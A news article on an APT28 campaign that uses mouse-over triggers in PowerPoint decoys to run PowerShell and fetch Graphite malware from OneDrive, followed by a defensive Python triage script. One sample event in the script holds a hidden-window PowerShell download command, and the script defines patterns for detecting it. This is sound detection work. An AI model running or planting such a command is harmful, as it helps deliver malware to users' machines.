2022-11-17

A threat group linked to the Russian state, known as Fancy Bear (it is also tracked under other names, such as APT28, Pawn Storm or Tsar Team), has put national security services and ordinary citizens around the world under threat with an online scam that uses a widely used program, Microsoft PowerPoint, to deceive users and make them fall into its trap.

Cybercriminals mainly target users related to security and governments

The scam exploits mouse movement over decoy Microsoft PowerPoint documents to install malware on both corporate computers and users' personal computers. The infection happens as soon as the user starts PowerPoint presentation mode and moves the mouse anywhere over the document.

The group attacks all types of users, but among the primary targets of the scam are entities and professionals working in the defense and government sectors of the main countries of Western and Eastern Europe.

To trick these users, the attack employs a decoy document built on a PowerPoint template linked to the Organization for Economic Co-operation and Development (OECD).

As the cybersecurity company Nunsys has pointed out, the scam operates as follows: the malware executes a PowerShell script, which downloads and activates a “dropper” from the OneDrive storage service.

Said “dropper”, a seemingly innocuous image file, serves to plant a persistent file or “payload”: a variant of the malware known as Graphite, which uses the Microsoft Graph API and OneDrive for command and control (C&C) communications in order to obtain information.

Given that the URLs used in the most recent attacks appeared active in August and September of this year (although threats have been found since last January), it is more than possible that further attacks are taking place today.

For this reason, extreme caution is necessary, not only among professionals in the defense and government sectors; it is also important not to neglect surveillance in other types of industries and even at a personal level, since PowerPoint is a widely used tool in companies of all sectors and among private users.

At a corporate level, having EDR (endpoint detection and response) tools on employees' devices to monitor traffic between devices and the network and to protect the workplace is essential.

Likewise, it is necessary to prohibit the use of macros in Office documents that come from unreliable sources and to disable the command line (PowerShell) in user profiles that do not require it.

Keeping the operating system up to date with the latest security patches and always using its latest version, as well as ensuring the backup system and having a reliable firewall, is essential to protect yourself from the Russian PowerPoint cyber-scam.
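As an added example (not code from the article or from Nunsys), the following Python triage script applies the chain described above to constructed, Sysmon-style process-creation records: it flags a shell spawned by PowerPoint, and a shell command line that reaches OneDrive or the Microsoft Graph API, which is where the dropper and the Graphite C&C traffic live. The field names, host names and sample events are assumptions, not indicators taken from the article.

```python
"""Toy EDR-style triage for the PowerPoint -> PowerShell -> OneDrive chain.
The events below are constructed samples, not real telemetry."""
import re
from typing import Dict, List, Tuple

OFFICE_PARENTS = {"powerpnt.exe", "winword.exe", "excel.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Legitimate Microsoft services the campaign abuses for staging and C&C
# (assumed canonical host names for OneDrive and the Graph API).
CLOUD_HOSTS = re.compile(r"(onedrive\.live\.com|graph\.microsoft\.com)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event is suspicious (empty list if none)."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    reasons: List[str] = []
    # 1. An Office viewer (PowerPoint in this campaign) should not spawn a shell.
    if parent in OFFICE_PARENTS and image in SHELLS:
        reasons.append(f"{parent} spawned {image}")
    # 2. A shell reaching OneDrive/Graph matches the dropper and C&C stages.
    if image in SHELLS and CLOUD_HOSTS.search(cmd):
        reasons.append("shell command line references OneDrive/Graph")
    # 3. Hiding the console is typical of a script the user was not meant to see.
    if image in SHELLS and HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window")
    return reasons

def scan(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (ProcessId, reasons) for every event with at least one hit."""
    hits = []
    for e in events:
        reasons = classify(e)
        if reasons:
            hits.append((e["ProcessId"], reasons))
    return hits

# Constructed sample events; the OneDrive path is a placeholder, not an IoC.
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": "1001", "ParentImage": OFFICE, "Image": PS,
     "CommandLine": 'powershell.exe -w hidden -c "Invoke-WebRequest https://onedrive.live.com/CONSTRUCTED-ID -OutFile $env:TEMP\\img.jpeg"'},
    {"ProcessId": "1002", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"},
    {"ProcessId": "1003", "ParentImage": OFFICE, "Image": OFFICE,
     "CommandLine": "POWERPNT.EXE /s deck.pptx"},
]

if __name__ == "__main__":
    for pid, why in scan(SAMPLE_EVENTS):
        print(pid, "; ".join(why))
```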